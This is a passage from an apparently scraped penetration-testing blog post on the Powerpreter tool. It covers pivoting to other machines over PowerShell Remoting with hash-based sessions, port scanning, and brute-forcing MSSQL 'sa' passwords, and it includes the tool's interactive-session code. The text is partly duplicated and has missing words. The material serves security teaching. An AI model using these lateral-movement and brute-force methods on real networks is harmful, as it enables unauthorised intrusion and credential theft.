



We can use Powerpreter to pivot to and poke other machines in a network. The assumption here is that we have local admin access to a machine in a network. That admin happens to have access to other machines in the network (as in many enterprise environments).



Pivot



Powerpreter contains Pivot functionality. It depends on Powershell Remoting to function. It means all which could be done using Pivot could be done even with Invoke-Command too. In fact, Pivot is just a wrapper around Invoke-Command.



Pivot could be used in both interactive and non-interactive mode. We can use username and password or use credentials of current session (for example, using a WCE generated powershell session).



Lets see a non-interactive Pivot to a single machine.









We can use it on multiple machines too. Lets see a non-interactive Pivot to multiple machines.







Nice and easy, isn't it.





Non-interactive is good but nothing beats an interactive session on a machine :) Let see interactive pivoting on multiple machines with a WCE-generated powershell (using password hashes).



Get-PSSession cmdlet to list the sessions. To interact with a session use Use-Session function of powerpreter.





We can use built-in cmdlet Enter-PSSession to interact, then why we have a separate function for similar thing in powerpreter? This happens when one tries to use Enter-PSSession from a powershell remoting session.





Points to note in above example:

1. When using Pivot from remote, note that we used username in form of "computer\username".

2. We got an error while trying to use Enter-PSSession from remote session, AFAIK it is not supported.

3. But Use-Session from powerpreter worked!



Why did Use-Session work?



function Use-Session { Use-Session -id Above command uses the credentials available with current powershell session (or other shell) to connect to target. It creates PSSsessions. Use Use-Session to interact with the created sessions. .LINK http://code.google.com/p/nishang #> Param ( [Parameter(Position = 0, Mandatory = $True)] $id) while($cmd -ne "exit") { $sess = Get-PSSession -Id $id $computername = $sess.ComputerName write-host -NoNewline "$computername> " $cmd = read-host $sb = [scriptblock]::Create($cmd) Invoke-Command -ScriptBlock $sb -Session $sess } } This is second post in the series about powerpreter. You can read the first part here: http://www.labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html We can use Powerpreter to pivot to and poke other machines in a network. The assumption here is that we have local admin access to a machine in a network. That admin happens to have access to other machines in the network (as in many enterprise environments).Powerpreter contains Pivot functionality. It depends on Powershell Remoting to function. It means all which could be done using Pivot could be done even with Invoke-Command too. In fact, Pivot is just a wrapper around Invoke-Command.Pivot could be used in both interactive and non-interactive mode. We can use username and password or use credentials of current session (for example, using a WCE generated powershell session).Lets see a non-interactive Pivot to a single machine.We can use it on multiple machines too. Lets see a non-interactive Pivot to multiple machines.Nice and easy, isn't it.Non-interactive is good but nothing beats an interactive session on a machine :) Let see interactive pivoting on multiple machines with a WCE-generated powershell (using password hashes).Nice, we have two sessions with us. We can usecmdlet to list the sessions. To interact with a session usefunction of powerpreter.We can use built-in cmdletto interact, then why we have a separate function for similar thing in powerpreter? This happens when one tries to usefrom a powershell remoting session.Points to note in above example:1. When using Pivot from remote, note that we used username in form of "".2. We got an error while trying to usefrom remote session, AFAIK it is not supported.3. Butfrom powerpreter worked!Why did Use-Session work?

Param( [Parameter(Mandatory = $true, Position = 0, ValueFromPipeLineByPropertyName = $true)] [Alias("PSComputerName","CN","MachineName","IP","IPAddress","ComputerName","Url","Ftp","Domain","DistinguishedName")] [string]$Identity, [parameter(Position = 1, ValueFromPipeLineByPropertyName = $true)] [string]$UserName, [parameter(Position = 2, ValueFromPipeLineByPropertyName = $true)] [string]$Password, [parameter(Position = 3)] [ValidateSet("SQL","FTP","ActiveDirectory","Web")] [string]$Service = "SQL" )

Invoke-Command is supported from a powershell remoting session. We are using it withparameter to save state and use it interactively.Now, lets have a look at couple more functionalities in powerpreter which could be used to poke other machines in the network.As the name suggest we can use this to port scan other machines on a network.Please note that we used the parameterto specify that we want a port scan, by default only a ping sweep is performed. There is a default port range which would be scanned but a custom port range could also be provided.Lets look for a MSSQL Server on the network.Bingo! We found one - already setup ;)We can use this to Brute Force services like MSSQL, ActiveDirectory, Web or FTP on other machines. Default service is MSSQL. Lets brute force with sa username on above discovered server.Yay we got one password! - this too has been setup already ;)As you can see we could use a list of password (also IP and username) instead of using a single password. There is a small catch here, the password list should start with the word "password" like this.Why? Have a look at the code snippet.